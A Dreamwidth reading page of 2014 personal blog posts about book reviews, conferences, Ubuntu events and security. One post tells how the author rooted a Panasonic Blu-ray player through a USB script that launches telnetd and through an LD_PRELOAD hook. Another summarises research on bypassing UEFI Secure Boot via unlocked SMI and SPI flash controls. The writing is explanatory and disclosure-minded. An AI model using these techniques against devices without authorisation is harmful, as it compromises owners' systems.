[personal profile] mjg59
I picked up a Panasonic BDT-230 a couple of months ago. Then I discovered that even though it appeared fairly straightforward to make it DVD region free (I have a large pile of PAL region 2 DVDs), the US models refuse to play back PAL content. We live in an era of software-defined functionality. While Panasonic could have designed a separate hardware SKU with a hard block on PAL output, that would seem like unnecessary expense. So, playing with the firmware seemed like a reasonable start.

Panasonic provide a nice download site for firmware updates, so I grabbed the most recent and set to work. Binwalk found a squashfs filesystem, which was a good sign. Less good was the block at the end of the firmware with "RSA" written around it in large letters. The simple approach of hacking the firmware, building a new image and flashing it to the device didn't appear likely to work.

Which left dealing with the installed software. The BDT-230 is based on a Mediatek chipset, and like most (all?) Mediatek systems runs a large binary called "bdpprog" that spawns about eleventy billion threads and does pretty much everything. Runnings strings over that showed, well, rather a lot, but most promisingly included a reference to "/mnt/sda1/vudu/vudu.sh". Other references to /mnt/sda1 made it pretty clear that it was the mount point for USB mass storage. There were a couple of other constraints that had to be satisfied, but soon attempting to run Vudu was actually setting a blank root password and launching telnetd.

/acfg/config_file_global.txt was the next stop. This is a set of tokens and values with useful looking names like "IDX_GB_PTT_COUNTRYCODE". I tried changing the values, but unfortunately made a poor guess - on next reboot, the player had reset itself to DVD region 5, Blu Ray region C and was talking to me in Russian. More inconveniently, the Vudu icon had vanished and I couldn't launch a shell any more.

But where there's one obvious mechanism for running arbitrary code, there's probably another. /usr/local/bin/browser.sh contained the wonderful line:
export LD_PRELOAD=/mnt/sda1/bbb/libSegFault.so
, so then it was just a matter of building a library that hooked open() and launched inetd and dropping that into the right place, and then opening the browser.

This time I set the country code correctly, rebooted and now I can actually watch Monkey Dust again. Hurrah! But, at the same time, concerning. This software has been written without any concern for security, and it listens on the network by default. If it took me this little time to find two entirely independent ways to run arbitrary code on the device, it doesn't seem like a stretch to believe that there are probably other vulnerabilities that can be exploited with less need for physical access.

The depressing part of this is that there's no reason to believe that Panasonic are especially bad here - especially since a large number of vendors are shipping much the same Mediatek code, and so probably have similar (if not identical) issues. The future is made up of network-connected appliances that are using your electricity to mine somebody else's Dogecoin. Our nightmarish dystopia may be stranger than expected.

Review: MaddAddam by Margaret Atwood

Apr. 20th, 2014 02:34 pm
miko: Photo of me by the river (Default)
[personal profile] miko
MaddAddam is the third and final novel in Atwood's post-apocalyptic series that started with Oryx and Crake. I read the second one (The Year of the Flood) relatively recently and found it underwhelming, you may recall. I'm happy to say that this one did improve my overall impression of the series, though I suspect that I enjoyed the first novel most.

So, while the first two books were concurrent with different characters, the third starts right after those and continues with both sets of characters surviving together in the decimated world. With one exception (the new information about the genetic spliced creatures), the current-time story (surviving) isn't very notable. Most of the book is actually about one character's history, Zeb, and about another character retelling it to the Crakers. The style is readable, though a bit put on toward the end when one of the Crakers is actually telling the story.

The book went by fast and I liked it well enough, but I wouldn't say it was mindblowing. It did redeem The Year of the Flood a fair bit.
miko: Photo of me by the river (Default)
[personal profile] miko
War Maid's Choice is the fourth (and most recent) book in the War God series. Up front, I like this series and recommend it... but since I've already talked about that for three books, take that as the baseline while I complain about a few things.

This book generally follows three character viewpoints: Bazhell, the lead for all of the books and champion of the war god; Leanna, who was a teenager when we last saw her and is now an adult war maid; and the villain of the moment. Like previous books, the villain sections remain a bit of a slog - they're where I most often put the book down, because I obviously don't like the character. It's not my favourite form of exposition.

The relationship between Bazhell and Leanna (you may recall my cringing at it while she was younger) is still incredibly meh. At least it's not really drawn out, but I didn't believe them as a pairing and it reads a bit creepy the same way Sparhawk/Ehlana did (if you're unfamiliar: young girl puts designs on older warrior and eventually "traps" him into marriage as an adult). Not as bad, but... eh.

Overall, the series may have hit its peak already for me. There were to many characters with similar names to try to keep straight, the stakes are getting unreasonably high and the battles unpicturably large. It's pretty clear there's another book planned to follow, and I'll probably read it, but it's getting too high fantasy for me if this is any indication.

Tourist in Montreal

Apr. 20th, 2014 10:11 am
pleia2: (Default)
[personal profile] pleia2

A couple weeks ago I was in Montreal for PyCon 2014. It was an amazing conference, but I was also glad to have some time to explore the beautiful city that is Montreal.

On Thursday (2nd day of tutorials) I didn’t have anything scheduled conference-wise, so I met up with my friend and long time Ubuntu contributor John Chiazzese (IdleOne). We’ve worked together online on Ubuntu for several years, and even both lived in the same area at the same time at one point, but we never managed to meet. My love of zoos landed us at the Montreal Biodome, housed in a former Olympic building.

The Biodome takes you through 4 different environments where they have mini-ecosystems for each and animals that populate the zones. The lynx were a big draw for me:

The river otter was also quite adorable and looking for attention. I also quite enjoyed the monkeys! And the penguins!

One of the evenings after the conference I joined a few of my colleagues to see And Then There Was Light sound and like show at the Notre Dame Basilica, not far from the convention center.

As a fan of historical religious buildings, I was eager for my chance to walk around the basilica as a tourist. The “sound and light show” portion of the show was a bit cheesy, giving folks a history of the French colonists and the basilica itself, but we had fun. Afterwards, we had 15 minutes to walk around and take photos, hooray!

Once they had pulled up the curtains used during the show, the interior did not disappoint. The alter in particular was spectacular:

I was also exposed to a lot of great food in Montreal, only a fraction of which I could eat. I had unfortunately fallen ill just before my trip and was on a strict bland diet – no red meat, no alcohol, no fatty foods. In a city full of steakhouses, wine and cheese this was a special kind of torture, but it did allow me to explore the menus beyond what I might typically order (and I did cheat a bit with the cheese). I ate a lot of chicken, fish and vegetables.

I was fortunate to have decent walking weather during most of the trip, but as the event wound down I found the chilly weather coming back, I even hear that there were some flurries the day after I left. Montreal is great, but was nice to be on my way back to California when the snow returned!

More photos from my tourist adventures in Montreal here: https://www.flickr.com/photos/pleia2/sets/72157643982902633/

Originally published at pleia2's blog. You can comment here or there.

Recovering....

Apr. 16th, 2014 05:33 pm
badgerbag: (Default)
[personal profile] badgerbag
Did ok on my trip, but just ok. I also got through work today. And I wrote a blog post because it seemed like it had to be done. But now I'm totally done touching a keyboard. Exhausted, in pain, a bit fevery feeling all over. I have not managed to unpack yet. Moomin helped me put away clean laundry. Zond7 ordered us groceries and cleaned up and we have a helpful house cleaner coming tomorrow. I need serious rest.

Read The Goblin Emperor, which I highly recommend! OMG... more like this!

Also, Pen Pal by Francesca Forrest.

Both excellent!!!

Finding a Tahr (or two!)

Apr. 16th, 2014 03:16 pm
pleia2: (Default)
[personal profile] pleia2

Tomorrow the next Ubuntu Long Term Support (LTS) release comes out, 14.04, development code name Trusty Tahr. In preparation, I was putting together some materials for our release event next week and found myself looking for the Tahr artwork when I remembered that it was included in the installer. So now I’ll share it with you as well!

If you go to this source page you will see a “download file” link which will allow you to download a .png of the tahr artwork.

Trusty Tahr

I haven’t found an svg version of this logo, but I’ll be sure to update this post if I do.

Looking for something slightly different? The Xubuntu team also included a tahr in our installer, created by Simon Steinbeiß:


This png has transparency, which make it show grey on white, but you can flavor it with any color you wish!

You can grab it at this source page where you will see the “download file” link. I’ve also uploaded the svg: art_tahr.svg

Enjoy! And happy release everyone!

Originally published at pleia2's blog. You can comment here or there.

beable: (on the aurora with philias fogg)
[personal profile] beable
So last night I went to sleep thinking about the Giant's Causeway, because trip planning research.

So having gone to sleep on a mythological bent, I ended up with a fair bit of Patricia Wrede's short story about the frying pan of doom bouncing about the dream landscape, which was still the Giant's Causeway (but clearly where it borders the Enchanted Forest).

And then when I woke up my radio alarm was playing the song Call Me Maybe, which I ended up hearing/dreaming as the daleks version of the song as I went back into snooze land.

(I just met you, and this is a crazy! I'm a Dalek, ex-ter-mi-nate!)

- - -

Dreaming about Patricia's Wrede's story made me somewhat crave after battle triple chocolate helmet cake, even if mostly I was interviewing kitchen maids who kept being hidden princesses in disguise, but it turned out one of them could really cook so it was ok.

- - -

So one of the tours of the Giant's Causeway is actually the Game of Thrones tour of Northern Ireland. (There is a 1 day option, which is all I'd have time for). I am embarrassed by how tempting that is, and trying to justify it to myself as the "interesting historical scenery with an added geeky bonus" tour.

(no subject)

Apr. 15th, 2014 12:01 am
beable: (Default)
[personal profile] beable
How Frozen should have ended.
With the best crossover ever:

http://youtu.be/4ThvBNZdGcQ

Real-world Secure Boot attacks

Apr. 13th, 2014 09:43 pm
[personal profile] mjg59
MITRE gave a presentation on UEFI Secure Boot at SyScan earlier this month. You should read the the presentation and paper, because it's really very good.

It describes a couple of attacks. The first is that some platforms store their Secure Boot policy in a run time UEFI variable. UEFI variables are split into two broad categories - boot time and run time. Boot time variables can only be accessed while in boot services - the moment the bootloader or kernel calls ExitBootServices(), they're inaccessible. Some vendors chose to leave the variable containing firmware settings available during run time, presumably because it makes it easier to implement tools for modifying firmware settings at the OS level. Unfortunately, some vendors left bits of Secure Boot policy in this space. The naive approach would be to simply disable Secure Boot entirely, but that means that the OS would be able to detect that the system wasn't in a secure state[1]. A more subtle approach is to modify the policy, such that the firmware chooses not to verify the signatures on files stored on fixed media. Drop in a new bootloader and victory is ensured.

But that's not a beautiful approach. It depends on the firmware vendor having made that mistake. What if you could just rewrite arbitrary variables, even if they're only supposed to be accessible in boot services? Variables are all stored in flash, connected to the chipset's SPI controller. Allowing arbitrary access to that from the OS would make it straightforward to modify the variables, even if they're boot time-only. So, thankfully, the SPI controller has some control mechanisms. The first is that any attempt to enable the write-access bit will cause a System Management Interrupt, at which point the CPU should trap into System Management Mode and (if the write attempt isn't authorised) flip it back. The second is to disable access from the OS entirely - all writes have to take place in System Management Mode.

The MITRE results show that around 0.03% of modern machines enable the second option. That's unfortunate, but the first option should still be sufficient[2]. Except the first option requires on the SMI actually firing. And, conveniently, Intel's chipsets have a bit that allows you to disable all SMI sources[3], and then have another bit to disable further writes to the first bit. Except 40% of the machines MITRE tested didn't bother setting that lock bit. So you can just disable SMI generation, remove the write-protect bit on the SPI controller and then write to arbitrary variables, including the SecureBoot enable one.

This is, uh, obviously a problem. The good news is that this has been communicated to firmware and system vendors and it should be fixed in the future. The bad news is that a significant proportion of existing systems can probably have their Secure Boot implementation circumvented. This is pretty unsurprisingly - I suggested that the first few generations would be broken back in 2012. Security tends to be an iterative process, and changing a branch of the industry that's historically not had to care into one that forms the root of platform trust is a difficult process. As the MITRE paper says, UEFI Secure Boot will be a genuine improvement in security. It's just going to take us a little while to get to the point where the more obvious flaws have been worked out.

[1] Unless the malware was intelligent enough to hook GetVariable, detect a request for SecureBoot and then give a fake answer, but who would do that?
[2] Impressively, basically everyone enables that.
[3] Great for dealing with bugs caused by YOUR ENTIRE COMPUTER BEING INTERRUPTED BY ARBITRARY VENDOR CODE, except unfortunately it also probably disables chunks of thermal management and stops various other things from working as well.

PyCon 2014 wrap-up

Apr. 13th, 2014 05:48 pm
pleia2: (Default)
[personal profile] pleia2

As I mentioned in my post about the PiDoorbell workshop, this past week I attended my first PyCon in beautiful (if chilly) Montreal, QC. I did some touristing, but I’ll write about that once I have all my photos up…

But now, the conference!

It was the first conference I’ve attended where I volunteered to help out with the HP booth. I was worried that my role as an engineer on the OpenStack project would leave me completely unprepared to answer questions about HP specifically, but I was instead greeted with kinship among most folks who I spoke with as they could appreciate HP’s investment in open source (and Python). I was also pleased to learn that the guys from the local HP office who came to help out with the booth were also all engineers, focused on either network or printing. Having the actual engineers to helped design the hardware we had on display at the booth was really cool.

Plus, I’m sure it helped that we have a bunch of open Python, OpenStack and other cloud jobs, so plenty of folks were eager to hear about those.

I wasn’t at the booth all weekend, I attended all the keynotes and several talks throughout the event. I think my favorite talks ended up being Track memory leaks in Python by Victor Stinner, Subprocess to FFI: Memory, Performance, and Why You Shouldn’t Shell Out by Christine Spang and In Depth PDB by Nathan Yergler. Upon reflection this makes sense given my work in ops, I’m much more likely to be debugging Python code in my typical day than writing something, so the talks about tracking down problems and performance issues are right up my alley.

The keynotes all three days were great. On Sunday I was particularly struck by the conference gender diversity. In addition to having a reported 1/3 female speakers and attendees, all the leadership in the Python community seem genuinely dedicated to the issue. I’m so used to projects that are still arguing over whether a problem exists let alone taking solid, unapologetic steps to correct the cultural bias. So thank you Python community, for giving us an opportunity to catch up, it’s working!

And finally, since I can’t go anywhere anymore without getting pulled into an OpenStack event, I finally met Dana Bauer from Rackspace this week and she invited me to come help out with a short OpenStack workshop for women on Sunday morning from 10 until noon. The lab they had set up didn’t quite work out, but it gave attendees the opportunity to go in the direction they wanted to. I was able to help a bit here and there, and James E. Blair gave a mini-presentation to a few folks on how to get going with DevStack.

At lunch I was able to meet up with Tatiana Al-Chueyr to chat some about the contribution workflow for OpenStack, which is always a lot of fun for me.

I’m pretty much exhausted from all the socializing, but as always with these conferences it was great to meet up with and chat with friends I haven’t seen in a long time. Thanks to everyone for such a fun week!

Tonight the weather started to turn chilly again, time to head home.

Originally published at pleia2's blog. You can comment here or there.

pleia2: (Default)
[personal profile] pleia2

The release of Ubuntu 14.04 (Trusty Tahr) LTS is coming up on Thursday, April 17th!

To celebrate, the Ubuntu California team in San Francisco will be hosting an Ubuntu release party at AdRoll! Huge thanks to them for offering us space for this event.

AdRoll

AdRoll is located at 972 Mission Street in San Francisco. It’s within easy walking distance of the Powell Street BART and MUNI stations, which we recommend since parking can be expensive downtown.

Our party will be very casual with free pizza and drinks for attendees. But we do have planned…

  • Mini presentation highlighting Ubuntu 14.04 features
  • Laptops running various flavors of 14.04
  • Tablets and phones running the latest Ubuntu build
  • Ubuntu quiz, with prizes!

So if you’re in the area and would like to join us, please RSVP here:

San Francisco Trusty Release Party

Alternatively you can email me directly at lyz@ubuntu.com and I’ll get you added to the attendee list.

I'm going to the Ubuntu Release Party

San Francisco isn’t the only active part of the state this release, San Diego is also hosting an event, on April 17th, details here. If you’re near Los Angeles, Nathan Haines is collaborating with the Orange County Linux Users Group (OCLUG) to do an installfest on Saturday May 24th, learn more here.

Not in California? Events are coming together all around the world, check out the LoCo Team Portal to see if there is an event being planned in your area: 14.04 Release Parties.

Originally published at pleia2's blog. You can comment here or there.

pleia2: (Default)
[personal profile] pleia2

This week I had the opportunity to attend PyCon for the first time. Since beginning to use Python in my systems work so much last year, I’ve had increasing interest in participating in this conference in some capacity, so when the opportunity came around at work to staff the HP booth here in Montreal I was happy to volunteer.

I was also brought to PyCon to be a Teaching Assistant for the Build your own PiDoorbell ! – Learn Home Automation with Python with fellow CodeChix members Rupa Dachere, Akkana Peck, Deepa Karnad Dhurka, Serpil Bayraktar and Stuart Easson.

We spent several weeks preparing for this tutorial. I made the trek down to Palo Alto twice to attend mini-sprints so we could test out the instructions in person prior to the event. We were able to add a number of improvements to both the code and documentation through these events and worked out some of the logistical issues of doing such a hardware event at a conference venue.


Workshop leads and TAs

The actual tutorial was held on Wednesday afternoon. Attendees quickly piled in and we were able to distribute our kits. Somehow we ended up with a few too many registrants but were able to scramble together a few extra pieces to make it work for everyone.

The tutorial was split into several sections, with the tutorial leads (Rupa and Akkana) giving presentations and us TAs going around and helping everyone with their setups when they got stuck. The biggest challenge for most was getting their system to talk to the Raspberry Pi, as we had folks on various operating systems with all kinds of network and USB setups.

Once we got everyone talking to the Pis, it was time for the fun stuff! Akkana gave a great presentation that was a tour of the hardware of the Raspberry Pi, including the setup of the GPIO pins configuration. For more about some cool hardware stuff she’s been doing with the Pi, I highly recommend her blog posts on the topic.

Then we had an led.py script to allow folks to make an LED blink:

As you can see, we’re using solderless breadboards so we didn’t have the complexity of soldering, thank goodness.

Then came the meat of the tutorial, wiring up the distance sensor (and camera if they had one) to actually detect when objects passed and take a photo. I brought along both my Raspberry Pi NoIR Camera Board – Infrared-sensitive Camera and my webcam from my desk at home so attendees could play around with them if they didn’t have ones of their own.

The last step was using Dropbox and Twilio to have a space to upload the photo to and then send out a notification.

Surprisingly for a hardware tutorial with such a diversity of host systems, I’m happy to report that most of the students were able to get the tutorial fully completed – at least to the point of taking pictures, if not the upload and notification portion. It was a lot of work for us TAs as we ran around helping everyone and debugging serial and networking issues, but it was worth it to see how much fun everyone had when they finally got an LED to blink or took their first picture.

All of the slides and source code is freely licensed, but the repository hasn’t been made available yet as Rupa wanted to fix some important bugs first (can’t have people frying their Pis!). But never fear, I’ll be following up to make sure it’s made available as soon as possible so others can do this too!

I’ve uploaded more photos from the event here: https://www.flickr.com/photos/pleia2/sets/72157643750475463/

Originally published at pleia2's blog. You can comment here or there.

pleia2: (Default)
[personal profile] pleia2

I’ve had a very busy year so far talk-wise. Back in January I gave a handful of sysadmin focused talks at Linux.conf.au in Perth, Western Australia. In February I did similar at the Southern California Linux Expo. In May I’ll be drifting slightly away from a Linux-only crowd to present at LOPSA-East in New Brunswick, New Jersey on May 3rd.

LOSPA-East 2014

First up on the schedule I’ll be doing my Code Review for Sys Admins talk:

I’m a member of the OpenStack Infrastructure team which is a geographically distributed team of systems administrators from several different companies who work together in public to maintain the infrastructure described at http://ci.openstack.org.

To achieve this, we use a code review system that leverages Gerrit as the interface for peer review and Jenkins to run some basic configuration and code syntax checking against our submissions. This allows us to maintain for code and config file integrity and gives us a nice platform so that our fellow systems administrators can comment on and improve solutions we come up with. We also use IRC, Etherpad and more for collaboration, which I will discuss.

I love giving this talk and I’m excited to be giving it at a conference focused at sysadmin-type folks in the industry.

But it gets better, they’ve also asked me to keynote on Saturday evening!

I’ve titled my talk Universal Design for Tech: Improving Gender Diversity in our Industry (thanks to Leigh Honeywell for the title idea):

Universal Design is a principle in accessibility that accessible design makes things better for everyone. A key example of which are curb cuts and door openers which help those who are disabled but also folks with luggage and parents with strollers.

Elizabeth will discuss ideas on how to improve gender diversity in our industry, but many of the tips will help everyone beyond improvements that come through diversity. From offering formal education for systems administration to offering flexible schedules and work arrangements, there are many things that can be done to attract much-needed talent.

As someone who has made it in the industry I’m keen on preserving the environment that I’ve grown and thrived in, but also in making small changes that I know would have helped me along the way and will help others, including women.

I also took some time to chat with Tom Limoncelli about my talk, which he’s posted on the Everything Sysadmin blog: Interview with LOPSA-East Keynote: Elizabeth Krumbach Joseph

Registration is still open for the conference and I hear there might even be some space at the hotel left (but it’s filling up fast!). Hope to see you there!

Originally published at pleia2's blog. You can comment here or there.

thorfinn: <user name="seedy_girl"> and <user name="thorfinn"> (Default)
[personal profile] thorfinn
Please Share Around: So, you may or may not have heard about "Heartbleed". A significant proportion[1], possibly 2/3rds of all "secure" web servers out there are currently essentially insecure (could be snooped on by anyone on the Internet), and this may have been the case since Mar 2012. The bug was publically announced on 7th of April 2014.

Right now, before you log in to any secure website (has the little lock icon), you should go here: http://filippo.io/Heartbleed

and enter the website name without the http or https bit, to check if the service is vulnerable.

If that doesn't work, try: https://lastpass.com/heartbleed (but that reports a lot of false "maybe"s, so it's not as useful).

If that still doesn't work, for an even more full on SSL test, go here: https://www.ssllabs.com/ssltest/index.html

If the service is reported as vulnerable - DO NOT LOG IN. Go and register a support complaint with that website, point them at http://filippo.io/Heartbleed and http://heartbleed.com/ and wait until they fix the problem. If you do log in and use the website, be aware that your login details (and anything else you send to/from that site) can be stolen by anyone on the Internet. Literally. It is that bad a bug.

Problematically, if you use smartphone apps that connect to a secure service at the back end, many of them may well be vulnerable, but you have no way of knowing. If you know what their website is, go test that, as they may be using the same service to provide their website.

Reliable secure service providers are starting to notify their customers of the situation and recommend changing your password.

If you know a service has been vulnerable to this bug, it is very much in your interest to change your password the moment it is fixed. Now is the time to find a password keeper application to randomly generate new unique passwords for every single site you log in to and store them for you. If you're an Apple only person, the iCloud Keychain is quite good (I'm told) and free, otherwise I highly recommend 1Password ( https://agilebits.com/onepassword ). There are other options for secure password keepers, if people who use other good ones wish to mention them in comments, please feel free.

If you have too many sites to check them all, you might want to prioritise. Here's [personal profile] skud on why You don’t need to change all your passwords.

You can take this one very seriously - Bruce Schneier, pretty much the top person regarding computer security, says '"Catastrophic" is the right word. On the scale of 1 to 10, this is an 11.' - https://www.schneier.com/blog/archives/2014/04/heartbleed.html

ETA: A "big sites" hitlist of who you *should* change your passwords with: http://mashable.com/2014/04/09/heartbleed-bug-websites-affected/

[1] ETA: Something like 6-10% of all sites, judging by this scan - Here's a list of 627 sites that were vulnerable on 8th April: https://github.com/musalbas/heartbleed-masstest/blob/b72a87558bfe37cd40327ec8b72386a2a2b99c69/README.md#627-of-the-top-10000-sites-appeared-vulnerable-on-april-8-1600-utc
skud: (Default)
[personal profile] skud
This is a crosspost from Infotropism. You can comment here or there.

This is probably going to be a wildly unpopular opinion and IDGAF. So many of my non-technical friends are freaking out that I feel the need to provide a bit of reassurance/reality.

First, an analogy.

In 2005 we learned that you can open a Kryptonite U-lock with a ballpoint pen. Everyone freaked out and changed their bike locks ASAP. Remember that?

Now, I wasn’t riding a bike at the time, but I started riding a bike a few years later in San Francisco, and I know how widespread bike theft is there. I used multiple levels of protection for my bike: a good lock, fancy locking posts on the seat and handlebars, and I parked my bike somewhere secure (work, home) about 90% of the time and only locked it up in public for short periods. Everywhere I went I saw sad, dismembered bike frames hanging forlornly from railings, reminding me of the danger. Those were paranoid times, and if I’d been riding in SF in 2005 you can bet I would have been first in line to replace my U-lock.

These days I live in Ballarat, a country town in Victoria, Australia. Few people ride bikes here and even fewer steal them. I happily leave my bike unlocked on friends’ front porches, dump it under a tree while I watch birds on the lake, lean it against the front of a shop just locked to itself while I grab a coffee, or park it outside divey music venues while I attend gigs late at night. I have approximately zero expectation of anything happening to it. If I heard that my bike lock had been compromised, I wouldn’t be in too desperate a hurry to change it.

Here’s the thing: if you are an ordinary Jane or Joe living the Internet equivalent of my cycling life in Ballarat, you don’t need to freak out about this thing.

Here are some websites I use where I’m not going to bother changing my password:

  • The place where I save interesting recipes
  • The one I go to to look at gifs of people in bands
  • That guitar forum
  • The one with the cool jewelry
  • The wiki I edit occasionally
  • The social network I only signed up for out of a sense of obligation but never use

Why? Because a) probably nobody’s going to bother trying to steal the passwords from there, and b) even if they did, so what?

This Heartbleed bug effectively reduces the privacy of an SSL-protected site (one whose URL starts with https://, which will probably show a lock in your browser’s address bar) to that of one without. Would you login to a site without SSL? Do you even know if the site uses SSL? If you’d login to your pet/recipe/knitting/music site anyway — if you’d do it from a coffee shop or airport — if you’d do it from a laptop or tablet or phone doesn’t have a strong password on it — if you don’t use two-factor authentication or don’t know what that means — then basically this won’t matter to you.

(I’m not saying it shouldn’t matter. You should probably set strong passwords and use VPNs and two-factor authentication. Just like you should probably lock your bike up everywhere you go, floss, and get your pap smears on the regular. Right? Right? *crickets*)

So if you’re a regular Jane — not working in IT security, not keeping state secrets, etc — here’s where you really need to change your passwords:

  • Any site you use to login to other sites (eg. Google, Facebook)
  • Any site that gives access to a good chunk of your money with just your password (eg. your bank, PayPal, Amazon)

(To do this: use this site to check if the site in question is affected, then if it’s “all clear” change your password. Don’t bother changing your password on a still-affected site, as that defeats the purpose. Oh, and you should probably change your passwords on those sites semi-regularly anyway, like maybe when you change the batteries in your smoke alarm. Which I just realised I should have done the other day and didn’t. Which tells you everything, really.)

Beyond those couple of key websites, you need to do a little risk assessment. Ask yourself questions like:

  • Has anyone ever heard of this site? Does anyone care? Is it likely to be a target of ominous dudes in balaclavas?
  • If I lost my login to this site, or someone could snoop what I had on that account, what is the worst that could happen?

If your answer is “I’d lose my job” or “I absolutely cannot survive without my extensive collection of Bucky/Steve fanart” then by all means change your password.

If your answer is “Eh, I’d sign up for a new one” or “Wait, even I’d forgotten that site existed” then you can probably stop freaking out quite so much.


DISCLAIMER: I am not an Internet security expert, just a moderately well-informed techhead. Some people, including better-informed ones, will disagree with me. You take this advice at your own risk. La la la what the fuck ever, you’ll most likely be fine.

skud: (Default)
[personal profile] skud
This is a crosspost from Infotropism. You can comment here or there.

As you might know, I’ve been working on 3000 Acres over the last few months. My time there is almost up and they’re looking for volunteers to continue developing the site. If anyone in the Melbourne area is interested in working with me on this, and then taking it over, please get in touch! It would be a great way to get involved in a tech project for sustainability/social good, and the 3000 Acres team are lovely people with a great vision. Feel free to drop me an email or ping me via whatever other means is convenient, and please help us get the word out.


3000 Acres connects people with vacant land to help them start community gardens. In 2013 3000 Acres was the winner of the VicHealth Seed Challenge, and is supported by VicHealth and The Australian Centre for Social Innnovation (TACSI) along with a range of partners from the sustainability, horticulture, and urban planning fields. We are in the process of incorporating as a non-profit.

Our website, which is the main way people interact with us, launched in February 2014. The site helps people map vacant lots, connect with other community members, and find community garden resources. Since our launch we have continued to improve and add features to our site.

So far, our web development has been done by one part-time developer. We are looking for another (or multiple) volunteer developers to help us continue to improve the site, and to help make our code ready to roll out to other cities.

We’re looking for someone with the following skills and experience:

  • Intermediate level Rails experience (or less Rails experience but strong backend web experience in general). You should be comfortable using an MVC framework, designing data structures, coding complex features, etc.
  • Comfort with CSS and Javascript (we mostly use Bootstrap 3.0 and Leaflet.js) and with light design work (eg. layout, icons)
  • Familiarity with agile software development, including iteration planning, test driven development, continuous integration, etc.
  • Strong communication skills: you’ll particularly use them for writing web copy, advising on information architecture, and project management.
  • You should be in Melbourne or able to travel regularly to Melbourne to meet with us. Phone, Skype, and screen sharing may also be used — our current developer is based in Ballarat.

We welcome applications from people of diverse backgrounds, and are flexible in our requirements; if you think you have skills that would work, even if they don’t match the above description exactly, please get in touch.

We envision this role being around 8 hours a week ongoing (somewhat flexible, and mostly from your own location). Initially you will work closely with our current developer, who can provide in-depth training/mentoring and documentation on our existing infrastructure and processes. Over the next 3 months you will become increasingly independent, after which time you will be expected to be able to create and maintain high-quality code without close technical supervision.

For more information you can check out:

If you’re interested in working with us, please drop Alex an email at skud@growstuff.org. No resume required — just let us know a bit about yourself, your experience, and why you want to work with us. If you can show us an example of some relevant work you’ve done in the past, that would be fantastic.

miko: Photo of me by the river (Default)
[personal profile] miko
Here's a bit of a random one - T picked this book up for me on a lark because I recommended the author's current series. To Be a Ninja is an unrelated kids book about... kids escaping from their drug dealer father and hiding in a secret ninja village?

Getting there is kinda hokey, but I enjoyed the book once it became a going-to-magic-school style young adult novel. I was a bit surprised that it was set up as a series - turns out there is another (and there was a third planned, before the author's other series picked up... he doesn't intend to write it now) that continues it.

Anyway, pleasant read. Interestingly, the author characterizes the girl as the main character (I would have said it was relatively split between her and her brother), but I'm glad to say there was no awkward kid romance (the bane of my re-reading most series in this age range).

Profile

terriko: (Default)
terriko

March 2014

S M T W T F S
       1
234567 8
910 1112131415
16171819202122
232425262728 29
3031     

Most Popular Tags

Style Credit

Expand Cut Tags

No cut tags
Page generated Apr. 21st, 2014 02:00 am
Powered by Dreamwidth Studios